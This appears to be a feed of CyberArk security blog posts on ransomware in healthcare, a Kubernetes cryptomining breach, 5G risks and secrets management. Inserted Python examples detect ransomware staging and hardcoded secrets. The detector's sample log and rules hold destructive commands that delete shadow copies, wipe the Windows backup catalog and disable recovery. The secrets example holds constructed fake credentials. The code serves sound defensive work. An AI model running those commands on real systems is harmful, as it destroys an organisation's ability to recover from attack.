Ransomware attacks begin by exploiting configuration gaps and access vulnerabilities to deliver malware. These are often accomplished by using ransomware-as-a-service kits (ready to use and easy to find on the dark web) to infect unpatched systems using common phishing techniques, drive-by malware downloads, known public exploits or brute-force credential theft.

Yet over the past several months, CyberArk Labs and the CyberArk Red Team have tracked a significant rise in operator-based ransomware attacks that look a lot different than these opportunistic “spray and pray” attempts.

Operator-based ransomware attacks are executed by highly skilled threat actors who can target — and react to — the specific attack surfaces of a specific organization. In many cases, these attackers operate in stealth mode for extended periods of time, utilizing advanced TTPs to find and steal credentials for both cloud and on-premises infrastructure — especially those with elevated admin privileges on endpoints, such as Microsoft Windows or macOS administrator accounts. Unfortunately, it’s no secret that in the healthcare industry, working as a privileged user (for example, a doctor making their rounds with a tablet that can access numerous patients’ medical records) or allowing a third-party vendor (for example, an insurance company or medical equipment supplier) to access a privileged system is all too common.

The attackers’ next objective is to harvest credentials for even higher privilege escalation and lateral movement, looking for more machines and more valuable data to extort. Once they’ve gained the necessary privileges, they often take the following steps:

  • First, they exfiltrate large amounts of sensitive data, such as PII.
  • Then, using high levels of privileged access and to avoid detection, they look for ways to “live off the land.” They take advantage of pre-installed programs and processes on a compromised endpoint that authorized privileged users, such as system admins, utilize often. By using the victim’s own tools against them, attackers appear legitimate, making it difficult for security teams to identify malicious activity. Plus, attackers don’t have to bother building or distributing new tools, which takes time and resources, and can raise red flags.
  • Finally, they execute their ransomware kit using built-in software distribution channels that the organization trusts and uses routinely. This is a highly effective tactic, as it allows the attackers to disable – or sometimes completely circumvent – existing security controls such as endpoint detection and response (EDR) or extended endpoint detection and response (XDR) tools.

Pay Up (Again) – Or We’ll Leak Your Patient Data, Too

During their attacks, ransomware threat actors look for ways to stealthily disrupt backups, delete shadow copies and unlock files to maximize their impact. In many virtual hostage situations, attackers will not only demand a ransom payment for decrypting target data but also threaten to leak it unless additional payment is made. According to F-Secure research, nearly 40% of ransomware families discovered in 2020 utilized such double-extortion methods.
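The living-off-the-land staging in the bullets above and the backup and shadow-copy disruption described here both leave traces in process-creation telemetry. The following is an added example, not CyberArk's code: a small rule set run over constructed Windows process-creation events, with a per-host correlation step so that a single administrative command does not page anyone; the log layout, host names and accounts are all constructed.

```python
"""Detect backup tampering and living-off-the-land process activity in
Windows process-creation telemetry. Added example, not CyberArk code.
Events are constructed and use a simplified pipe-separated layout:
timestamp|host|user|parent_image|image|command_line"""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta
import re

# Constructed sample events. The first three are routine; the last four
# resemble the staging the post describes: a privileged account using
# built-in tools to wipe recovery points, then a script host launched
# from a document viewer on a clinician's workstation.
SAMPLE_LOG = """\
2021-06-01T08:01:02|WS-NURSE-07|HOSP\\jdoe|C:\\Windows\\explorer.exe|C:\\Program Files\\EHR\\ehr.exe|"ehr.exe" --open-chart
2021-06-01T08:05:44|WS-NURSE-07|HOSP\\jdoe|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
2021-06-01T09:12:10|SRV-FILE-01|HOSP\\svc_backup|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\vssadmin.exe|vssadmin list shadows
2021-06-01T23:40:05|SRV-FILE-01|HOSP\\adm_ops|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\vssadmin.exe|vssadmin delete shadows /all /quiet
2021-06-01T23:40:09|SRV-FILE-01|HOSP\\adm_ops|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\wbadmin.exe|wbadmin delete catalog -quiet
2021-06-01T23:41:30|SRV-FILE-01|HOSP\\adm_ops|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\bcdedit.exe|bcdedit /set {default} recoveryenabled no
2021-06-01T23:45:12|WS-NURSE-07|HOSP\\jdoe|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -NoProfile -WindowStyle Hidden -File stage.ps1
"""

ProcessEvent = namedtuple("ProcessEvent", "timestamp host user parent_image image command_line")
Alert = namedtuple("Alert", "timestamp host user rule severity command_line")

# Built-in tools whose arguments destroy recovery points (ATT&CK T1490).
# Matching the image name plus an argument pattern keeps routine use such
# as `vssadmin list shadows` quiet.
BACKUP_TAMPER_RULES = [
    ("vssadmin.exe", re.compile(r"delete\s+shadows", re.I), "Volume shadow copies deleted"),
    ("wmic.exe", re.compile(r"shadowcopy\s+delete", re.I), "Volume shadow copies deleted via WMI"),
    ("wbadmin.exe", re.compile(r"delete\s+(catalog|systemstatebackup)", re.I), "Windows backup catalog deleted"),
    ("bcdedit.exe", re.compile(r"recoveryenabled\s+no", re.I), "Windows recovery environment disabled"),
]
# Document viewers have no business spawning shells or script hosts
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_events(log_text):
    """Parse the simplified log layout into ProcessEvent records."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|", 5)
        if len(parts) != 6:
            raise ValueError(f"malformed event: {line!r}")
        events.append(ProcessEvent(*parts))
    return events


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Apply both rule families to each event; alerts come back in log order."""
    alerts = []
    for ev in events:
        image, parent = _basename(ev.image), _basename(ev.parent_image)
        for exe, pattern, title in BACKUP_TAMPER_RULES:
            if image == exe and pattern.search(ev.command_line):
                alerts.append(Alert(ev.timestamp, ev.host, ev.user, title, "high", ev.command_line))
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            alerts.append(Alert(ev.timestamp, ev.host, ev.user,
                                "Script host spawned by Office application", "medium", ev.command_line))
    return alerts


def escalate(alerts, window_minutes=10, threshold=2):
    """Hosts with `threshold` or more high-severity alerts inside `window_minutes`.
    One backup command can be legitimate administration; several in quick
    succession is the pre-encryption pattern worth isolating a host for."""
    times_by_host = defaultdict(list)
    for a in alerts:
        if a.severity == "high":
            times_by_host[a.host].append(datetime.fromisoformat(a.timestamp))
    window = timedelta(minutes=window_minutes)
    flagged = set()
    for host, times in times_by_host.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(host)
                break
    return flagged


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_LOG))
    for a in found:
        print(f"[{a.severity}] {a.timestamp} {a.host} {a.user}: {a.rule} <- {a.command_line}")
    print("hosts to isolate:", sorted(escalate(found)))
```

In a real deployment the same rules would run over Sysmon event 1 or Security event 4688 fields rather than this constructed layout, and the correlation window would be tuned to the environment's backup schedule.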

Just last month, the FBI issued a report on a spike in Conti ransomware attacks targeting U.S. healthcare and first-responder networks. According to report authors, “If the ransom is not paid, the stolen data is sold or published to a public site controlled by the Conti actors. Ransom amounts vary widely and, we assess, are tailored to the victim. Recent ransom demands have been as high as $25 million.”

We’ll Be Back

You can also count on these savvy ransomware operators to think ahead. During their privilege escalation efforts, they often leave backdoors or hidden identities so they can re-enter the victim’s environment in the future. The U.K.’s National Cyber Security Centre (NCSC) recently shared a cautionary tale of an organization that paid millions in bitcoin to recover its files but failed to take necessary steps to identify the attack’s root cause and secure their network. As a result, the same attackers came back just two weeks later, using the same techniques to re-deploy the same ransomware, forcing the organization to pay the hefty ransom again.

How Healthcare Can Stay Ahead of Ransomware Attacks

As ransomware attacks become more sophisticated and highly targeted, healthcare organizations recognize the need to proactively ramp up their security posture to protect critical infrastructure and preserve patient care and trust.

National Institute of Standards and Technology (NIST) and HIPAA guidelines provide prescriptive recommendations to help strengthen defenses — and all echo the importance of least privilege, access and identity restrictions as the core foundation for a modern cybersecurity program based on Zero Trust.

That’s why identity-centric controls are so important to incorporate as part of a defense-in-depth endpoint security strategy, along with EDR and XDR, next-generation anti-virus (NGAV), data and network analysis, threat hunting and incident response tools. Not only can Identity Security solutions help detect and block the malware itself, but by “trusting nothing and verifying everything” they also work to stop identity and privilege abuse at critical points in the attack chain. As a result, threats can be found and stopped before they do harm. Once these controls are in place, healthcare organizations can focus on enhancing cybersecurity awareness and skills training, revisiting digital security fundamentals and hardening and backing up critical hospital systems to protect against future attacks.

To learn how your healthcare organization can reduce the endpoint attack surface by combining least privilege, ransomware protection, application control and other identity-centric capabilities, read our new eBook and get a jump-start with CyberArk Endpoint Privilege Manager – our SaaS solution proven to protect against 3 million strains of ransomware and counting.

Cryptomining Cloud Attack: Compromise Sensitive Console Access
https://www.cyberark.com/blog/cryptomining-cloud-attack-compromise-sensitive-console-access/ (Fri, 25 Jun 2021 13:00:04 +0000)

Remember how the Ocean’s Eleven crew couldn’t just attack one casino… they had to go for three? Well, the same goes for some cyber criminals who think, “Why stop at data theft when I can also hijack cloud resources for profit?” For many financially motivated attackers, more is more.

In this final piece of our real-world cloud attack series, we examine the breach of a high-profile organization that went straight for a sensitive management console in the cloud to orchestrate a sophisticated cryptomining scheme.

A Sophisticated Cryptomining Cloud Attack

Attack Phase 1: Entry

Attackers pinpointed and accessed a publicly exposed Kubernetes console that was not protected by a password or by multi-factor authentication (MFA). While this may sound like an egregious oversight, the truth is these powerful admin portals — whether they are specific cloud application development tools such as container orchestration platforms, or those used to manage all cloud projects and resources hosted by a specific cloud provider — are often overlooked and unintentionally exposed.

Attack Phase 2: Exploration

The attackers discovered that within one Kubernetes pod, access credentials were exposed to the company’s cloud environment, which contained a cloud database housing sensitive data. This included proprietary telemetry data used to monitor quality and performance and improve customer experiences.

Attack Phase 3: Exploitation

The attackers commandeered the cloud console, ran scripts and used mining software to harness the company’s costly cloud resources to mine for cryptocurrency. To remain under the radar, they intentionally reduced CPU usage and masked their IP using a proxy server.

The Result

By appropriating compute resources, this attack ultimately cost the victim organization thousands of dollars in cloud services. And while cryptomining appears to have been their main goal, the attackers inevitably stumbled across some other “cloud goodies” along the way. These locally stored cloud access keys unlocked storage databases containing confidential information, including sensitive telemetry data on the company’s customers, which could have been used to damage the company’s brand and reputation.

To explore the full cryptomining attack chain, watch the video.

The “Elite Eleven” Cloud Identity Security Safeguards

Danny Ocean had his 11 accomplices, and fortunately, when it comes to protecting against attacks on identity in the cloud, we’ve got our own “elite eleven” — safeguards, that is.

From protecting against attacks that exploit cloud misconfigured identities, to those that hijack credentials embedded in code, to those that compromise sensitive console access, the following foundational steps can help you embrace a model of identity-centric security to drive resilience in the modern threat landscape. To explore all 11 recommendations, download this eBook.

1. Gain visibility into your permissions. As cloud adoption increases, so does the attack surface in the form of increasing permissions for business users and machine identities. To reduce risk, organizations must first get a strong handle on what cloud resources business users have access to, and when, and also identify ways to uncover hidden, unused and misconfigured permissions across your cloud footprint at scale.

2. Rotate and manage standing privileged credentials. Privileged credentials that provide employees, as well as third-party vendors, with 24/7 access to public cloud resources, consoles, security tools, RPA, automation tools, IT management and more must be protected with strong Privileged Access Management controls. Also consider just-in-time access to reduce standing privileges and overall risk exposure.

3. Strengthen access controls with MFA. Verifying that people are who they say they are may sound obvious, but it often goes wrong when organizations rely on only one verification method like a single set of credentials that are easily stolen or compromised. MFA plays an instrumental role in verifying user identities and preventing compromise — particularly when it comes to SaaS applications that are regularly accessed from outside the network.

4. Federate access to cloud resources like consoles, virtual machines and CLIs and authenticate with your preferred identity provider.

5. Implement least privilege throughout your cloud estate. This includes limiting access for highly privileged users and DevOps tool admins to demonstrate compliance with industry frameworks such as the Cloud Security Alliance’s Cloud Control Matrix.

Looking for additional guidance on protecting identity and privilege in the cloud? The CyberArk Blueprint for Identity Security Success provides a proven framework for assessing your current strategy and defining a roadmap for long-term success.

Preparing for the 5G Revolution Starts with Understanding Identity Security Threats
https://www.cyberark.com/blog/preparing-for-the-5g-revolution-starts-with-understanding-identity-security-threats/ (Tue, 22 Jun 2021 13:00:02 +0000)

The fifth generation of wireless technology — 5G for short — promises to redefine the network, as well as digital experiences as we know them. But with any rapid tech advancement, there’s also the certainty that 5G, which has been described as “a digital revolution” and “bridge to the future,” will open new opportunities for malicious disruption and cyber attacks. By 2025, 5G networks are expected to cover about half of the world’s population — so we should now be deeply exploring the new dimensions of potential implications and vulnerabilities it will create that could be exploited by cybercriminals and nation-states.

To help organizations navigate the evolving 5G threat landscape, U.S. government agencies including the National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) recently published an analysis paper on potential threat vectors and new risks introduced by 5G adoption. We’ll summarize some of the major takeaways and share some high-level recommendations from our own team. But first, here’s a look at what 5G means for both consumers and industry players.

The Promise of 5G Connectivity

For consumers, 5G will usher in a new age of virtual experiences and digital content. It’s not just next-generation gaming, augmented reality, and immersive experiences that make 5G so exciting; faster speeds and lower latency will impact virtually every aspect of life. That includes the way we work. 5G is hyped to accelerate businesses’ digital transformations, drive internal efficiencies, and spark innovation. For communications services providers (CSPs) specifically, the opportunity to deliver new customer experiences and offerings is tremendous. The same is true for 5G network operators who will build and operate the systems architecture that underpins these new business models.

Inevitable Risks in the Wake of 5G Rollout

This transformational mobile bandwidth is coming online at the same time that the Internet of Things (IoT) is reaching critical mass. Yet by enabling a new wave of connected devices and services, the number and types of identities in an organization’s infrastructure will also expand.

Attackers often rely on compromising identities — linked to humans, devices, and applications — and subsequent manipulation of privileged credentials to reach their targets’ most sensitive data, applications, or infrastructure. Earlier this year, the Verkada IoT breach gave us a glimpse of what can happen when thousands of interconnected devices are not secured like other sensitive network assets. And as modern society relies on internet connectivity more than ever, the late 2020 revelations that Google was hit with a 2.5 Tbps distributed denial-of-service (DDoS) attack a few years back demonstrated what’s possible in terms of attack scale.

5G networks not only provide foundational connectivity for innumerable services but also transmit and store private data for consumers, businesses and government. This means that such attacks can reverberate far beyond the initial incident. And as the 5G roll-out intensifies, we can expect to see attacks become more frequent, sophisticated and larger in scale. It’s already happening: the telecom industry was the number one target of DDoS attacks in the first quarter of 2021.

NSA, ODNI and CISA Analysis of 5G Threat Vectors

The U.S. government’s recently released analysis paper, “The Potential Threat Vectors to 5G Infrastructure,” aims to inform stakeholders on cybersecurity risks and drive collaborative solutions. The paper digs into known and potential threats to the 5G environment, sample scenarios of where 5G may be adopted, and assessed risks to 5G core technologies. Here’s a look at two of the major threat vectors identified by the authors: the 5G supply chain and systems architecture.

Securing the 5G Supply Chain

The global battle over 5G supremacy and the resulting rush to establish necessary 5G critical infrastructure has created a perfect opportunity for attackers to conduct cyber espionage campaigns, foreign interference, and other malicious activities. The authors note that the entire 5G supply chain is susceptible to the introduction of risks such as “malicious software and hardware, counterfeit components, poor designs, manufacturing processes, and maintenance procedures.”

And the billions of connected 5G devices compound the problem. A single act of tampering at any point in the 5G supply chain could have a massive ripple effect. For example, business and home equipment like routers, smartphones, and IoT devices could be compromised en masse, while countries that purchase 5G equipment from companies with compromised supply chains could be vulnerable to interception, manipulation, disruption, or destruction of data.

Securing 5G Systems Architecture

Building out the critical 5G systems architecture that can meet the data, capacity, and communication requirements of the network requires a number of new technologies, such as software-defined networking, cloud-native infrastructure, network slicing, and edge computing. These tools, however, also serve to further increase the attack surface. While 5G component manufacturers and service providers are enhancing security through technology improvements, malicious actors can potentially exploit vulnerabilities — both legacy and those that are brand new — authors warn.

Privileged accounts and credentials provide superuser access to critical telecommunications infrastructure on-premises, in the cloud, and in hybrid environments. Yet too often, privileged access to critical systems is left unsecured and unmanaged. This puts assets at an increased risk of a damaging cyber attack that could impact telecommunications companies and citizens alike.

Six Identity Security Considerations for the 5G Era

An identity-centric approach to security emphasizes that privileged access management is critical to help address the gaps and vulnerabilities that attackers look to exploit in supply chain attacks — as well as strengthening the very core of 5G infrastructure.

Here are six key security considerations for telecommunications organizations and 5G architects to help improve their current security posture and mitigate the risk of future compromise:

1. Discover and manage credentials belonging to machine identities on IoT devices, as well as 5G component systems. Also, consider pre-supported integrations for managing privileged access to legacy infrastructure to enable interoperability. This will help prevent the malicious use of privileged accounts and credentials, the most common path to an organization’s most valuable assets.

2. Help prevent lateral movement across 5G networks by isolating and monitoring human-led privileged sessions to critical infrastructure.

3. Remove local admin rights and implement least privilege controls on all edge devices, endpoints, and servers to help defend against ransomware attacks. Similarly, enforce least privilege throughout public cloud infrastructure.

4. Work to ensure software is consistently patched and always up to date, especially in accordance with recent government guidance.

5. Continuously assess and improve the security of customer-facing products and services, with emphasis on the security practices of digital supply chain partners.

6. Consider investing in threat monitoring and anomaly detection technologies to monitor access activity and act on suspicious behavior in real time.

This is the dawning of the age of 5G and IoT, and with seemingly endless possibilities comes significant new risk. A strong defense will require an “assume breach” mindset, with a focus on protecting identities to prevent attackers from reaching their end goals.

How Federal Agencies Can Secure Secrets in Automation Environments at Scale
https://www.cyberark.com/blog/how-federal-agencies-can-secure-secrets-in-automation-environments-at-scale/ (Tue, 15 Jun 2021 17:33:50 +0000)

IT modernization in the federal government sector is more than just plugging in new technology. It’s about changing the way government workers operate to be more efficient, effective, and transparent — all while bolstering cybersecurity to help secure critical systems and protect citizens.

“As digital technology evolves, our adversaries are releasing updated capabilities and features just as quickly as we are,” said CyberArk DevSecOps specialist Mark Hurter during his talk at the recent GovLoop virtual summit “7 Perspectives on Transforming Government.” Staying ahead of emerging threats requires a proactive — and increasingly automated — approach to security. Here, we summarize some of his key presentation messages, highlight a real-world federal success story and look at how automation plays a big role in the broader push to DevSecOps.

Unprotected Secrets in the DevOps Pipeline Put Agencies at Risk

Recent software supply chain attacks such as SolarWinds and Codecov have highlighted new levels of attacker creativity and opportunism, the growing risk to CI/CD pipelines and the potential for amplified damage and disruption. In response, the White House last month issued an executive order emphasizing the need for enhanced software security to strengthen the country’s cyber resilience.

The security of the CI/CD pipeline, the backbone of government DevOps environments, and applications themselves are vital to federal agencies’ ability to perform critical functions and achieve their missions. But speed is just as important. “Whether the end-user is a warfighter in the military or the public-at-large, federal agencies must be able to rapidly deliver new capabilities and remediate vulnerabilities in lockstep to deliver end-user advantage and reduce risk,” said Hurter.

The government’s progression from traditional waterfall development practices to agile, CI/CD methodologies is helping security, operations and development teams break down traditionally siloed functions and work in concert to get secure code out the door faster.

All of this is made possible through automation. Likewise, automation and privileged access go hand-in-hand. Take Red Hat Ansible, one of the leading automation platforms, for example. In order to execute automation functions such as standing up a virtual machine (VM), managing configurations, or copying, releasing, and re-installing code, Ansible playbooks require, and hold, powerful privileged credentials and secrets. Because of this, Ansible and other CI/CD pipeline tools are attractive targets for cyber criminals.

Unprotected secrets, whether in automation playbooks, scripts, code, or elsewhere can put agencies at risk, and also violate federal compliance regulations because they could grant attackers unrestricted access to sensitive government data and infrastructure. And as the number of secrets grows, it becomes exponentially harder for agencies to store, transmit and audit secrets securely.

Case Study: How a Federal Government Contractor Secures and Retrieves Ansible Secrets at Scale

A centralized, automated secrets management approach can help federal agencies, along with organizations providing services to the government, to reduce operational complexity, protect and accelerate digital transformation initiatives and achieve compliance with important standards like FISMA and NIST.

In his GovLoop presentation, Hurter shared a real-world example of this in action. A large defense contractor that managed more than 85,000 networking devices across a federal government environment needed a way to apply configuration changes across this massive tech stack efficiently.

“The only way you can solve that problem was with efficient and secure automation,” Hurter said.

But it had to be done right: that meant forgoing the use of one shared key or small set of unmanaged keys that could unlock access to systems across the environment.

“‘One key to rule them all’ means that not only can your administrator access all 85,000 networking devices, so can an attacker or unauthorized user,” said Hurter. “Very rarely will there be a legitimate need for someone to access all 85,000 systems. That’s why it’s important to intelligently limit access to only what users need to perform their specified functions.”

The risky practice of storing, or “hardcoding,” secrets within the agency’s automation platform of choice, Red Hat Ansible, was also out of the question. Instead, secrets were placed in a secure repository — bolstered by multi-factor authentication (MFA) — where they could be automatically managed, rotated, audited, and when needed, retrieved quickly and securely. Identities, whether human or machine, can now be managed by role-based access control, while policy-as-code allows the organization to store the current state of the service in version control.

Through streamlined secrets management made possible by out-of-the-box integrations between Red Hat Ansible and CyberArk Conjur, the defense organization can now perform configuration management as code — automating updates (including important security changes) or deploying new assets across the entire network stack in less than two hours. Explore this federal case study in detail to learn more about protecting Ansible secrets and driving operational efficiency with CyberArk.
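Both the pod credentials found in Attack Phase 2 of the cryptomining post above and the hardcoded Ansible secrets this case study rules out come down to the same thing: a literal credential sitting in a file that ships with the workload. The following added example, which is not CyberArk's or Red Hat's code, scans constructed Kubernetes and Ansible documents for such values and places each weak document beside its hardened form, one reading from a Kubernetes Secret object and one fetching the value at run time through a Conjur lookup; the `cyberark.conjur.conjur_variable` lookup name, the secret paths and every other identifier are assumptions.

```python
"""Find credentials hardcoded in deployment and automation files and show
the same files referencing a secret store instead. Added example, not
CyberArk or Red Hat code; every document, name and secret path below is
constructed for illustration."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "source line key preview")

# Key names that usually carry a credential
SECRET_KEY = re.compile(r"(?i)(password|passwd|secret|token|api[_-]?key|access[_-]?key|private[_-]?key)")
# Values that reference a store rather than embedding the secret:
# a Jinja lookup (Ansible), ${VAR} expansion, or an ansible-vault scalar
REFERENCE = re.compile(r"\{\{.*lookup\(|\$\{[A-Za-z_]|!vault")
ASSIGNMENT = re.compile(r"^\s*-?\s*(?P<key>[A-Za-z0-9_.-]+)\s*[:=]\s*(?P<value>.*)$")

# Pod spec with cloud keys pasted into environment variables, the kind of
# exposure described in Attack Phase 2 of the cryptomining post
POD_HARDCODED = """\
kind: Pod
spec:
  containers:
  - name: worker
    env:
    - name: CLOUD_ACCESS_KEY_ID
      value: AKIAEXAMPLE0000000000
    - name: CLOUD_SECRET_ACCESS_KEY
      value: constructedSecretValue00000000000000000000
    - name: LOG_LEVEL
      value: info
"""
# Same pod reading both values from a Kubernetes Secret object
POD_HARDENED = """\
kind: Pod
spec:
  containers:
  - name: worker
    env:
    - name: CLOUD_ACCESS_KEY_ID
      valueFrom: {secretKeyRef: {name: telemetry-cloud-creds, key: access-key-id}}
    - name: CLOUD_SECRET_ACCESS_KEY
      valueFrom: {secretKeyRef: {name: telemetry-cloud-creds, key: secret-access-key}}
    - name: LOG_LEVEL
      value: info
"""
# Playbook variables with network device credentials in plain text
PLAYBOOK_HARDCODED = """\
- hosts: core_routers
  vars:
    ansible_user: netadmin
    ansible_password: R0uterAdm1n-2021
    enable_secret: En4bleM3-now
"""
# Same play fetching a per-device secret at run time through the
# cyberark.conjur collection's conjur_variable lookup (assumed installed)
PLAYBOOK_HARDENED = """\
- hosts: core_routers
  vars:
    ansible_user: netadmin
    ansible_password: "{{ lookup('cyberark.conjur.conjur_variable', 'net/core/' ~ inventory_hostname ~ '/password') }}"
    enable_secret: "{{ lookup('cyberark.conjur.conjur_variable', 'net/core/' ~ inventory_hostname ~ '/enable') }}"
"""


def find_hardcoded_secrets(text, source="<doc>"):
    """Line scanner for YAML-style key/value files. Understands the Kubernetes
    env convention, where the variable name and its value sit on consecutive
    lines (`- name: X` followed by `value:` or `valueFrom:`)."""
    findings = []
    pending_env = None  # env var name waiting for its value line
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = ASSIGNMENT.match(raw)
        if not m:
            continue
        key, value = m.group("key"), m.group("value").strip()
        if key == "name":
            pending_env = value if SECRET_KEY.search(value) else None
            continue
        if key == "valueFrom":  # resolved from a Secret object, never inline
            pending_env = None
            continue
        if not value:  # mapping header such as `env:` or `vars:`
            continue
        if key == "value" and pending_env:
            key, pending_env = pending_env, None
        elif not SECRET_KEY.search(key):
            continue
        if not REFERENCE.search(value):
            findings.append(Finding(source, lineno, key, value[:3] + "..."))
    return findings


if __name__ == "__main__":
    for src, doc in [("pod", POD_HARDCODED), ("pod-hardened", POD_HARDENED),
                     ("routers", PLAYBOOK_HARDCODED), ("routers-hardened", PLAYBOOK_HARDENED)]:
        for f in find_hardcoded_secrets(doc, src):
            print(f"{f.source} line {f.line}: hardcoded {f.key} = {f.preview}")
```

The scanner reports only the first three characters of each hit so the finding itself does not copy the secret into a ticket or log.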

Securing Automated CI/CD Pipelines Means Security from Inception

Automation is one of several critical enablers of DevSecOps — a broader philosophy that emphasizes the need to integrate security into every phase of the software development lifecycle.

DevSecOps also means automating key security processes, such as secrets management, to keep DevOps workflows moving fast. Adopting the right tools and approaches can help your agency meet these objectives.

But of course, DevSecOps is primarily about people — it requires communication, collaboration, empathy and cultural change. It highlights the need to engage security teams from the start of DevOps initiatives while empowering developers to easily adopt security best practices without slowing down.

“Involve security early and often,” said Hurter. “They should be a partner. They should not be a roadblock.”

He continued, “By securing code at inception, federal agencies can minimize time spent refactoring code because it wasn’t done right the first time, eliminate cycles spent pushing new copies of secrets to new disparate credential stores, respond to incidents faster, and ultimately, focus on delivering more value to end-users.”

Red Hat and CyberArk: Automating and Securing DevOps Together

Watch Hurter’s full presentation, “How to Use Automation Data Securely & Safely in Government” on-demand (free registration required). And visit our team this week at the virtual Red Hat Summit to learn more about CyberArk and Red Hat’s joint efforts to automate and secure DevOps, while supporting organizations in both the public and private sectors on their path to IT modernization. Registered Red Hat Summit attendees can also explore a leading financial institution’s IT automation journey in the on-demand session “Ansible + CyberArk = More secure digital transformation: The CIBC case study.”

For additional resources, discover secrets management made simple, check out our joint solution brief or set up a personalized demo to learn how CyberArk and Red Hat can help you secure your automation workloads.

Impact Live 2021: Security Teams Gain Application Security Mandate https://www.cyberark.com/blog/impact-live-2021-security-teams-gain-application-security-mandate/ Thu, 10 Jun 2021 16:46:53 +0000 https://www.cyberark.com/?p=119223

Cybersecurity teams are starting to play a much larger role in application security as organizations look to implement a more systematic approach to securing software supply chains on an end-to-end basis.

During its virtual CyberArk Impact Live 2021 conference this week, industry experts noted that rather than relying on developers who often lack security expertise to manage application secrets, more organizations are shifting that responsibility to cybersecurity teams with the backgrounds and technical acumen needed to address fast-evolving threats. These teams are employing platforms designed from the ground up to make those secrets available to applications only when they’re required.

Who Owns Secrets Management, Anyway?

It hasn’t always been that way. In many organizations, “ownership” of secrets management — from requirements to platform selection and operations — was never really defined. Many developers shouldered the task themselves, often managing application secrets directly within their applications in the name of simplicity and speed. But if those applications are compromised, all the secrets stored by the developer are readily available in plain text. Given the current emphasis on CI/CD pipeline vulnerabilities, “Security teams are getting responsibility for the application secret management problem, and that’s new,” said Uzi Ailon, Vice President, DevSecOps Solutions for CyberArk, during an “Insider Story: DevOps Subject Matter Experts Share Their Experiences” session.

Cybersecurity teams are now deploying separate repositories to safeguard application secrets that are then made available to applications on-demand via an application programming interface (API).

Organizations are generally either pursuing a prescriptive approach to managing secrets across their entire software portfolio or, at the very least, providing developers with a self-service platform through which application secrets are tightly managed, Ailon noted.

The New CISO Mandate: No Secrets Left Behind

That shift is at the core of a new mandate that chief information security officers (CISOs) now have in the wake of a series of high-profile breaches of software supply chains, noted James Creamer, Identity Security Strategy and Content Architect at CyberArk, during his “The New CISO Mandate: Securing the Entire App Portfolio” session.

Armed with that mandate, CISOs are pursuing a top-down approach as part of an effort to ensure that every application secret is protected. “No secret will be left behind,” Creamer said.

That shift is occurring at a time when many organizations are trying to implement best DevSecOps practices by shifting more responsibility for application security further left to developers. The challenge is that developers are already hard-pressed to keep up with the current rate at which they are being asked to build applications. And if security isn’t automated and integrated into existing workflows, the probability a developer will make a mistake managing application secrets increases with each new project.

Each organization will need to identify the best approach to managing application secrets themselves. Some are prioritizing their efforts based on the level of risk to the business, while others are focusing on applications built by, for example, DevOps teams that are more open to adopting new processes as part of ongoing efforts to automate application development and deployment.

Regardless of who takes responsibility for application security, it’s clear that when it comes to application secrets management there has never been a greater sense of urgency. Cybercriminals are now regularly launching low-level phishing and impersonation attacks against development teams to gain access to credentials and abuse privileges that enable them to compromise entire application environments. Unless, of course, the secrets within those applications are encrypted and then stored in a digital repository that’s really difficult (and expensive) for attackers to try to crack.

Editor’s note: CyberArk Impact Live 2021 has wrapped, but you can still register to enable playback sessions on demand.

Impact Live 2021: Advancing Zero Trust IT with PAM and IAM https://www.cyberark.com/blog/impact-live-2021-advancing-zero-trust-it-with-pam-and-iam/ Wed, 09 Jun 2021 19:20:27 +0000 https://www.cyberark.com/?p=119187

During its virtual CyberArk Impact Live 2021 conference this week, the company showcased a broad portfolio of security solutions that are central to any Zero Trust approach to securing an IT environment based on identity.

The Changing Nature of Privilege

The need for strong Privileged Access Management (PAM) controls has continued to increase as IT teams look to secure what have become highly distributed computing environments due to the pandemic, digital transformation, cloud migration and the shift left. Not only are end users more likely to be accessing corporate resources from anywhere, but they now expect it, noted Yuval Moss, CyberArk VP Identity Security, in his talk, “What is Identity Security?”

While several years ago only small groups of users (mostly IT admins) were considered privileged, this isn’t the case in today’s cloud and hybrid environments. What’s more, it’s become apparent that each machine — and even individual components of an application — have an identity that needs to be managed. Without the right controls in place, any of these identities can become a privileged identity, opening doors to valuable data and assets.

Similarly, the attacker landscape is evolving. “Cyber attackers have increased in number, sophistication and aggression,” said CyberArk Chief Strategy Officer and Head of Corporate Development, Clarence Hinton, in his keynote. “These factors have combined to lead to an exponential increase in cybersecurity threats facing enterprises across the globe.”

A Security-First, Least Privilege View of Identity-Related Risk

Rather than managing PAM and Identity Access Management (IAM) platforms in isolation, CyberArk is making a compelling case for integrating these capabilities via a unified software as a service (SaaS) platform to achieve and maintain Zero Trust security in the most frictionless way possible.

The company, as part of that effort, showed how organizations can apply policies based on identity and least privilege access rules to desktops or even specific end users using either single sign-on (SSO) or biometric tools.

“PAM and IAM are coming together,” said Khizar Sultan, Senior Director for Product and Solution Strategy at CyberArk during a “Why Integrating PAM and IAM Is Essential to Your Identity Security Strategy” session. “Identity winds up actually being the new perimeter for security.”

CyberArk also stressed the need to protect end users by enabling policies to isolate sessions using a continuous authentication mechanism that makes certain end users are active in a session, in addition to protecting them from cyber attacks aimed specifically at browsers. As an extension of that capability, it’s critical to enable an audit trail that tracks all actions made during a session.

